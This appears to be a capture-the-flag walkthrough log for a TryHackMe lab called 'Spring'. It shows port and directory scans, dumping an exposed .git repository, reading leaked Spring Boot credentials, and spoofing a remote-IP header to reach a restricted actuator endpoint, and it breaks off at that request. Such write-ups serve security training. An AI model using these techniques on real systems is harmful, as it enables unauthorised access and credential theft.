Spring

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90

kali@kali:~/CTFs/tryhackme/Spring$ sudo nmap -A -sS -sC -sV -O 10.10.6.25
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-20 11:24 CEST
Nmap scan report for 10.10.6.25
Host is up (0.034s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE   VERSION
22/tcp  open  ssh       OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 89:a8:db:e1:3d:ab:0e:ea:da:d8:8d:a7:bc:56:fc:da (RSA)
|   256 7d:b2:aa:19:18:31:6c:62:18:7b:3b:96:11:02:54:9d (ECDSA)
|_  256 26:32:b9:96:69:a8:cb:14:b4:8c:e8:f0:d5:74:bd:6e (ED25519)
80/tcp  open  http
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 302
|     Cache-Control: private
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Location: https://localhost/
|     Content-Length: 0
|     Date: Tue, 20 Oct 2020 09:24:35 GMT
|     Connection: close
|   RTSPRequest, X11Probe:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Tue, 20 Oct 2020 09:24:35 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_    Request</h1></body></html>
|_http-title: Did not follow redirect to https://10.10.6.25/
443/tcp open  ssl/https
|_http-title: Site doesn't have a title (text/plain;charset=UTF-8).
|_ssl-date: 2020-10-20T09:25:27+00:00; +1s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.80%I=7%D=10/20%Time=5F8EACD3%P=x86_64-pc-linux-gnu%r(Get
SF:Request,BA,"HTTP/1\.1\x20302\x20\r\nCache-Control:\x20private\r\nExpire
SF:s:\x20Thu,\x2001\x20Jan\x201970\x2000:00:00\x20GMT\r\nLocation:\x20http
SF:s://localhost/\r\nContent-Length:\x200\r\nDate:\x20Tue,\x2020\x20Oct\x2
SF:02020\x2009:24:35\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(HTTPOption
SF:s,BA,"HTTP/1\.1\x20302\x20\r\nCache-Control:\x20private\r\nExpires:\x20
SF:Thu,\x2001\x20Jan\x201970\x2000:00:00\x20GMT\r\nLocation:\x20https://lo
SF:calhost/\r\nContent-Length:\x200\r\nDate:\x20Tue,\x2020\x20Oct\x202020\
SF:x2009:24:35\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,24E,
SF:"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nCo
SF:ntent-Language:\x20en\r\nContent-Length:\x20435\r\nDate:\x20Tue,\x2020\
SF:x20Oct\x202020\x2009:24:35\x20GMT\r\nConnection:\x20close\r\n\r\n<!doct
SF:ype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Status\x20400\x20
SF:\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"text/css\">body\
SF:x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20
SF:{color:white;background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h
SF:2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12
SF:px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;background-color:#
SF:525D76;border:none;}</style></head><body><h1>HTTP\x20Status\x20400\x20\
SF:xe2\x80\x93\x20Bad\x20Request</h1></body></html>")%r(X11Probe,24E,"HTTP
SF:/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent
SF:-Language:\x20en\r\nContent-Length:\x20435\r\nDate:\x20Tue,\x2020\x20Oc
SF:t\x202020\x2009:24:35\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x
SF:20html><html\x20lang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\
SF:x80\x93\x20Bad\x20Request</title><style\x20type=\"text/css\">body\x20{f
SF:ont-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{colo
SF:r:white;background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20
SF:{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\
SF:x20a\x20{color:black;}\x20\.line\x20{height:1px;background-color:#525D7
SF:6;border:none;}</style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x
SF:80\x93\x20Bad\x20Request</h1></body></html>");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=10/20%OT=22%CT=1%CU=39449%PV=Y%DS=2%DC=T%G=Y%TM=5F8EAD
OS:42%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST
OS:11NW7%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)EC
OS:N(R=Y%DF=Y%T=40%W=F507%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT      ADDRESS
1   36.19 ms 10.8.0.1
2   36.27 ms 10.10.6.25

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.73 seconds

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

kali@kali:~/CTFs/tryhackme/Spring$ sudo /opt/dirsearch/dirsearch.py -u https://10.10.6.25/ -t 200 -E -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -R 5

  _|. _ _  _  _  _ _|_    v0.4.0
 (_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, jspx, html, htm, js | HTTP method: GET | Threads: 200 | Wordlist size: 220520 | Recursion level: 5

Error Log: /opt/dirsearch/logs/errors-20-10-20_11-27-43.log

Target: https://10.10.6.25/

Output File: /opt/dirsearch/reports/10.10.6.25/_20-10-20_11-27-43.txt

[11:27:43] Starting:
[11:27:58] 302 -    0B  - /sources  ->  /sources/     (Added to queue)
[11:30:57] 400 -  435B  - /http%3A%2F%2Fwww
CTRL+C detected: Pausing threads, please wait...

Canceled by the user

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

kali@kali:~/CTFs/tryhackme/Spring$ sudo /opt/dirsearch/dirsearch.py -u https://10.10.6.25/sources/new/ -t 200 -E -r -R 5

  _|. _ _  _  _  _ _|_    v0.4.0
 (_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, jspx, html, htm, js | HTTP method: GET | Threads: 200 | Wordlist size: 10457 | Recursion level: 5

Error Log: /opt/dirsearch/logs/errors-20-10-20_11-33-15.log

Target: https://10.10.6.25/sources/new/

Output File: /opt/dirsearch/reports/10.10.6.25/sources.new_20-10-20_11-33-15.txt

[11:33:15] Starting:
[11:33:18] 200 -  148B  - /sources/new/.git/config
[11:33:18] 200 -  401B  - /sources/new/.git/COMMIT_EDITMSG
[11:33:19] 200 -  240B  - /sources/new/.git/info/exclude
[11:33:19] 200 -    1KB - /sources/new/.git/index
[11:33:19] 302 -    0B  - /sources/new/.git/logs/refs  ->  /sources/new/.git/logs/refs/     (Added to queue)
[11:33:19] 302 -    0B  - /sources/new/.git/logs/refs/heads  ->  /sources/new/.git/logs/refs/heads/     (Added to queue)
[11:33:19] 200 -   73B  - /sources/new/.git/description
[11:33:19] 200 -  319B  - /sources/new/.git/logs/refs/heads/master
[11:33:19] 302 -    0B  - /sources/new/.git/refs/heads  ->  /sources/new/.git/refs/heads/     (Added to queue)
[11:33:19] 302 -    0B  - /sources/new/.git/refs/tags  ->  /sources/new/.git/refs/tags/     (Added to queue)
[11:33:19] 200 -   41B  - /sources/new/.git/refs/heads/master
[11:33:24] 400 -  435B  - /sources/new/a%5c.aspx
CTRL+C detected: Pausing threads, please wait...

Canceled by the user

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168

kali@kali:~/CTFs/tryhackme/Spring$ mkdir git_data
kali@kali:~/CTFs/tryhackme/Spring$ /opt/git-dumper/git-dumper.py https://10.10.6.25/sources/new/.git/ ./git_data/
[-] Testing https://10.10.6.25/sources/new/.git/HEAD [200]
[-] Testing https://10.10.6.25/sources/new/.git/ [404]
[-] Fetching common files
[-] Fetching https://10.10.6.25/sources/new/.git/description [200]
[-] Fetching https://10.10.6.25/sources/new/.git/hooks/post-update.sample [200]
[-] Fetching https://10.10.6.25/sources/new/.git/COMMIT_EDITMSG [200]
[-] Fetching https://10.10.6.25/sources/new/.git/hooks/pre-applypatch.sample [200]
[-] Fetching https://10.10.6.25/sources/new/.git/hooks/post-commit.sample [404]
[-] Fetching https://10.10.6.25/sources/new/.git/hooks/commit-msg.sample [200]
[-] Fetching https://10.10.6.25/sources/new/.git/hooks/pre-push.sample [200]
[-] Fetching https://10.10.6.25/sources/new/.git/hooks/applypatch-msg.sample [200]
[-] Fetching https://10.10.6.25/sources/new/.git/hooks/pre-commit.sample [200]
[-] Fetching https://10.10.6.25/sources/new/.git/hooks/pre-rebase.sample [200]
[-] Fetching https://10.10.6.25/sources/new/.git/hooks/post-receive.sample [404]
[-] Fetching https://10.10.6.25/sources/new/.git/hooks/pre-receive.sample [200]
[-] Fetching https://10.10.6.25/sources/new/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching https://10.10.6.25/sources/new/.gitignore [200]
[-] Fetching https://10.10.6.25/sources/new/.git/index [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/info/packs [404]
[-] Fetching https://10.10.6.25/sources/new/.git/info/exclude [200]
[-] Fetching https://10.10.6.25/sources/new/.git/hooks/update.sample [200]
[-] Finding refs/
[-] Fetching https://10.10.6.25/sources/new/.git/HEAD [200]
[-] Fetching https://10.10.6.25/sources/new/.git/logs/refs/remotes/origin/HEAD [404]
[-] Fetching https://10.10.6.25/sources/new/.git/logs/refs/stash [404]
[-] Fetching https://10.10.6.25/sources/new/.git/FETCH_HEAD [404]
[-] Fetching https://10.10.6.25/sources/new/.git/info/refs [404]
[-] Fetching https://10.10.6.25/sources/new/.git/logs/refs/remotes/origin/master [404]
[-] Fetching https://10.10.6.25/sources/new/.git/config [200]
[-] Fetching https://10.10.6.25/sources/new/.git/ORIG_HEAD [404]
[-] Fetching https://10.10.6.25/sources/new/.git/logs/HEAD [200]
[-] Fetching https://10.10.6.25/sources/new/.git/logs/refs/heads/master [200]
[-] Fetching https://10.10.6.25/sources/new/.git/packed-refs [404]
[-] Fetching https://10.10.6.25/sources/new/.git/refs/heads/master [200]
[-] Fetching https://10.10.6.25/sources/new/.git/refs/remotes/origin/HEAD [404]
[-] Fetching https://10.10.6.25/sources/new/.git/refs/remotes/origin/master [404]
[-] Fetching https://10.10.6.25/sources/new/.git/refs/stash [404]
[-] Fetching https://10.10.6.25/sources/new/.git/refs/wip/wtree/refs/heads/master [404]
[-] Fetching https://10.10.6.25/sources/new/.git/refs/wip/index/refs/heads/master [404]
[-] Finding packs
[-] Finding objects
[-] Fetching objects
[-] Fetching https://10.10.6.25/sources/new/.git/objects/92/b433a86a015517f746a3437ba3802be9146722 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/00/00000000000000000000000000000000000000 [404]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/b4/63ef229486f86eeb72b89539bd3339e485807f [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/d5/c72b751a3a756eb27f4f07664842d252dc4928 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/66/058471882cd13e7e1229d7df0ecb1437b61e78 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/29/e4f3b4e2234b489d695f8c262c1b4a1b6f6e9a [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/a9/f778a7a964b6f01c904ee667903f005d6df556 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/9a/8d7e300995dabbb2f0ab9a117f2ee02068aa8d [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/eb/f1ef86a29a04cc7ad00bdbc656056a6250e3f6 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/8f/8904743c007a1542d0047be84912b7aa15279f [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/6b/d070178569781eb0534f575e52157aa59a501e [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/5d/eeca1fbb8b02b7a5fbf1776a9b6fc803afda32 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/06/e4e487ea33b438eddd5f01d01980e8eb483d54 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/93/407ced89dfa0d7e574bb117c6bbee7a0d40bc9 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/1a/83ec34bf5ab3a89096346c46f6fda2d26da7e6 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/71/e18111b0f82be167bcdf44501c40552d9e10ad [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/e4/9a401d2e07d18bbd9bfc492d71c4467d16d2b3 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/0f/4ff745b9480ab23ff47a25542e16094117c35a [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/0a/e5a6c68f4da02b8cb399eb0b90ead4272d7cd1 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/39/858db3349ea85bfc5b0120dc5d2ca45f0683af [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/6d/e5c4c83edbf094c885d02be5f275f589d452ac [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/bf/ee42398426f27ae8511e6f4e613207854fdb6d [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/6f/b8af92ee8f251b33184e01597255e87459ecb7 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/67/3abbf42bad7eff6574b6ea8759cea232cf63e7 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/a4/c5e5165ecd93acf7f243da71430d4edcc2c780 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/5a/89f76e57f381e38efa3179fd69cf8ee7fd1e54 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/fc/719eba62e24fd379fd44dc35f1ab25f49ef231 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/cc/f5992a16348d803da54a48aa64f24f81569380 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/0c/304b129922b9739c4193b9a9b71b3050a0867d [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/fd/861389321333ed895fe9c22a79254db774a150 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/5e/a2aaeb59bb380f001a3a1569bb127d4834152a [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/98/c8673dc8c0250e15f6a4c4ac7f90a7c8555dbb [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/69/871575a847bfef00491cd5912a59682b427525 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/80/c24d20f6bb44e6e2d16aaf133f866a2182f597 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/3d/b1ee8004fe3cad3b3637e018abdf443e328e3a [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/fe/e60fff5d20f703d74d02fa9a57ed364d9210ee [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/f6/d1a5ff67503ff152c3be8db995939e22f20da6 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/f0/f2f7760ac45cfeb34ced824b2abfbc6e436000 [200]
[-] Fetching https://10.10.6.25/sources/new/.git/objects/7b/8c746815c823dc9983dc27fc31e69dac3c7bf1 [200]
[-] Running git checkout .
kali@kali:~/CTFs/tryhackme/Spring$ cd git_data/
kali@kali:~/CTFs/tryhackme/Spring/git_data$ git log
commit 1a83ec34bf5ab3a89096346c46f6fda2d26da7e6 (HEAD -> master)
Author: John Smith <johnsmith@spring.thm>
Date:   Fri Jul 10 18:13:55 2020 +0000

    added greeting
    changed security password to my usual format

commit 92b433a86a015517f746a3437ba3802be9146722
Author: John Smith <johnsmith@spring.thm>
Date:   Sat Jul 4 23:53:25 2020 +0000

    Hello world
kali@kali:~/CTFs/tryhackme/Spring/git_data$ git reset --hard 1a83ec34bf5ab3a89096346c46f6fda2d26da7e6
HEAD is now at 1a83ec3 added greeting changed security password to my usual format
kali@kali:~/CTFs/tryhackme/Spring/git_data$ find . -ls |grep -v \\.git
  1449991      4 drwxr-xr-x   5 kali     kali         4096 Oct 20 11:34 .
  1450039      4 -rw-r--r--   1 kali     kali           28 Oct 20 11:34 ./settings.gradle
  1450038      4 -rw-r--r--   1 kali     kali         3058 Oct 20 11:34 ./gradlew.bat
  1450037      8 -rw-r--r--   1 kali     kali         5441 Oct 20 11:34 ./gradlew
  2621980      4 drwxr-xr-x   4 kali     kali         4096 Oct 20 11:34 ./src
  2621981      4 drwxr-xr-x   4 kali     kali         4096 Oct 20 11:34 ./src/main
  2621982      4 drwxr-xr-x   4 kali     kali         4096 Oct 20 11:34 ./src/main/java
  2621985      4 drwxr-xr-x   3 kali     kali         4096 Oct 20 11:34 ./src/main/java/com
  2621986      4 drwxr-xr-x   3 kali     kali         4096 Oct 20 11:34 ./src/main/java/com/onurshin
  2621987      4 drwxr-xr-x   2 kali     kali         4096 Oct 20 11:34 ./src/main/java/com/onurshin/spring
  2621988      8 -rw-r--r--   1 kali     kali         4350 Oct 20 11:34 ./src/main/java/com/onurshin/spring/Application.java
  2621983      4 drwxr-xr-x   2 kali     kali         4096 Oct 20 11:34 ./src/main/java/META-INF
  2621984      4 -rw-r--r--   1 kali     kali           70 Oct 20 11:34 ./src/main/java/META-INF/MANIFEST.MF
  2621989      4 drwxr-xr-x   2 kali     kali         4096 Oct 20 11:34 ./src/main/resources
  2621990      4 -rw-r--r--   1 kali     kali         1007 Oct 20 11:34 ./src/main/resources/application.properties
  2621991      4 -rw-r--r--   1 kali     kali         2581 Oct 20 11:34 ./src/main/resources/dummycert.p12
  2621992      4 drwxr-xr-x   3 kali     kali         4096 Oct 20 11:34 ./src/test
  2621993      4 drwxr-xr-x   3 kali     kali         4096 Oct 20 11:34 ./src/test/java
  2621994      4 drwxr-xr-x   3 kali     kali         4096 Oct 20 11:34 ./src/test/java/com
  2621995      4 drwxr-xr-x   3 kali     kali         4096 Oct 20 11:34 ./src/test/java/com/onurshin
  2621996      4 drwxr-xr-x   2 kali     kali         4096 Oct 20 11:34 ./src/test/java/com/onurshin/spring
  2621997      4 -rw-r--r--   1 kali     kali          214 Oct 20 11:34 ./src/test/java/com/onurshin/spring/ApplicationTests.java
  1450036      4 drwxr-xr-x   3 kali     kali         4096 Oct 20 11:34 ./gradle
  2621978      4 drwxr-xr-x   2 kali     kali         4096 Oct 20 11:34 ./gradle/wrapper
  2621979      4 -rw-r--r--   1 kali     kali          238 Oct 20 11:34 ./gradle/wrapper/gradle-wrapper.properties
  1450035      4 -rw-r--r--   1 kali     kali         1151 Oct 20 11:34 ./build.gradle
kali@kali:~/CTFs/tryhackme/Spring/git_data$ cat build.gradle
plugins {
    id 'org.springframework.boot' version '2.3.1.RELEASE'
    id 'io.spring.dependency-management' version '1.0.9.RELEASE'
    id 'java'
}

group = 'com.onurshin'
version = '0.0.1-SNAPSHOT'
sourceCompatibility = '1.8'

repositories {
    mavenCentral()
}

ext {
    set('springCloudVersion', "Greenwich.SR4")
}
dependencies {
    implementation 'org.springframework.boot:spring-boot-starter-actuator'
    implementation 'org.springframework.boot:spring-boot-starter-web'
    implementation 'org.springframework.boot:spring-boot-starter-security'
    implementation 'org.springframework.boot:spring-boot-starter-data-jpa'

    implementation 'org.springframework.cloud:spring-cloud-starter-config'
    runtimeOnly 'com.h2database:h2'

    testImplementation('org.springframework.boot:spring-boot-starter-test') {
        exclude group: 'org.junit.vintage', module: 'junit-vintage-engine'
    }
    testImplementation 'org.springframework.security:spring-security-test'
}

dependencyManagement {
    imports {
        mavenBom "org.springframework.cloud:spring-cloud-dependencies:${springCloudVersion}"
    }
}
test {
    useJUnitPlatform()
}

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107

kali@kali:~/CTFs/tryhackme/Spring/git_data$ ls -la src/main/java/com/onurshin/spring/
total 16
drwxr-xr-x 2 kali kali 4096 Oct 20 11:34 .
drwxr-xr-x 3 kali kali 4096 Oct 20 11:34 ..
-rw-r--r-- 1 kali kali 4350 Oct 20 11:34 Application.java
kali@kali:~/CTFs/tryhackme/Spring/git_data$ cat src/main/java/com/onurshin/spring/Application.java
package com.onurshin.spring;

import org.apache.catalina.Context;
import org.apache.catalina.Wrapper;
import org.apache.catalina.connector.Connector;
import org.apache.catalina.startup.Tomcat;
import org.apache.tomcat.util.descriptor.web.SecurityCollection;
import org.apache.tomcat.util.descriptor.web.SecurityConstraint;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.boot.autoconfigure.web.servlet.error.ErrorMvcAutoConfiguration;
import org.springframework.boot.web.embedded.tomcat.TomcatServletWebServerFactory;
import org.springframework.boot.web.embedded.tomcat.TomcatWebServer;
import org.springframework.boot.web.servlet.server.ServletWebServerFactory;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;

@SpringBootApplication(exclude = {ErrorMvcAutoConfiguration.class})
public class Application {

    public static void main(String[] args) {
        SpringApplication.run(Application.class, args);
    }

    @RestController
    //https://spring.io/guides/gs/rest-service/
    static class HelloWorldController {
        @RequestMapping("/")
        public String hello(@RequestParam(value = "name", defaultValue = "World") String name) {
            System.out.println(name);
            return String.format("Hello, %s!", name);
        }
    }


    private Connector redirectConnector() {
        Connector connector = new Connector("org.apache.coyote.http11.Http11NioProtocol");
        connector.setScheme("http");
        connector.setPort(80);
        connector.setSecure(false);
        connector.setRedirectPort(443);
        return connector;
    }

    @Bean
    public ServletWebServerFactory servletContainer() {
        TomcatServletWebServerFactory factory = new TomcatServletWebServerFactory() {
            @Override
            protected void postProcessContext(Context context) {
                SecurityConstraint securityConstraint = new SecurityConstraint();
                securityConstraint.setUserConstraint("CONFIDENTIAL");
                SecurityCollection collection = new SecurityCollection();
                collection.addPattern("/*");
                securityConstraint.addCollection(collection);
                context.addConstraint(securityConstraint);
                context.setUseHttpOnly(true);
            }

            @Override
            protected TomcatWebServer getTomcatWebServer(Tomcat tomcat) {
                Context context = tomcat.addContext("/sources", "/opt/spring/sources/");
                context.setParentClassLoader(getClass().getClassLoader());
                context.setUseHttpOnly(true);

                Wrapper defaultServlet = context.createWrapper();
                defaultServlet.setName("default");
                defaultServlet.setServletClass("org.apache.catalina.servlets.DefaultServlet");
                defaultServlet.addInitParameter("debug", "0");
                defaultServlet.addInitParameter("listings", "false");
                defaultServlet.setLoadOnStartup(1);
                defaultServlet.setOverridable(true);
                context.addChild(defaultServlet);
                context.addServletMappingDecoded("/", "default");

                return super.getTomcatWebServer(tomcat);
            }
        };
        factory.addAdditionalTomcatConnectors(redirectConnector());
        return factory;
    }

    @Configuration
    @EnableWebSecurity
    static class SecurityConfig extends WebSecurityConfigurerAdapter {

        @Override
        protected void configure(HttpSecurity http) throws Exception {
            http
                    .authorizeRequests()
                    .antMatchers("/actuator**/**").hasIpAddress("172.16.0.0/24")
                    .and().csrf().disable();
        }

    }
}

1
2

kali@kali:~/CTFs/tryhackme/Spring/git_data$ curl https://10.10.6.25/?name=pentester -k
Hello, pentester!

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21

kali@kali:~/CTFs/tryhackme/Spring/git_data$ cat src/main/resources/application.properties
server.port=443
server.ssl.key-store=classpath:dummycert.p12
server.ssl.key-store-password=DummyKeystorePassword123.
server.ssl.keyStoreType=PKCS12
management.endpoints.enabled-by-default=true
management.endpoints.web.exposure.include=health,env,beans,shutdown,mappings,restart
management.endpoint.env.keys-to-sanitize=
server.forward-headers-strategy=native
server.tomcat.remoteip.remote-ip-header=x-9ad42dea0356cb04
server.error.whitelabel.enabled=false
spring.autoconfigure.exclude=org.springframework.boot.autoconfigure.web.servlet.error.ErrorMvcAutoConfiguration
server.servlet.register-default-servlet=true
spring.mvc.ignore-default-model-on-redirect=true
spring.security.user.name=johnsmith
spring.security.user.password=PrettyS3cureSpringPassword123.
debug=false
spring.cloud.config.uri=
spring.cloud.config.allow-override=true
management.endpoint.heapdump.enabled=false
spring.resources.static-locations=classpath:/META-INF/resources/, classpath:/resources/, classpath:/static/, classpath:/public/

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

kali@kali:~/CTFs/tryhackme/Spring$ curl https://10.10.6.25/actuator/ -H 'x-9ad42dea0356cb04: 172.16.0.21' -k -v
*   Trying 10.10.6.25:443...
* Connected to 10.10.6.25 (10.10.6.25) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/certs/ca-certificates.crt
  CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN, server did not agree to a protocol
* Server certificate:
*  subject: C=Unknown; ST=Unknown; L=Unknown; O=spring.thm; OU=Unknown; CN=John Smith
*  start date: Jul  4 15:33:44 2020 GMT
*  expire date: Apr 18 15:33:44 2294 GMT
*  issuer: C=Unknown; ST=Unknown; L=Unknown; O=spring.thm; OU=Unknown; CN=John Smith
*  SSL certificate verify result: self signed certificate (18), continuing anyway.
> GET /actuator/ HTTP/1.1
> Host: 10.10.6.25
> User-Agent: curl/7.72.0
> Accept: */*
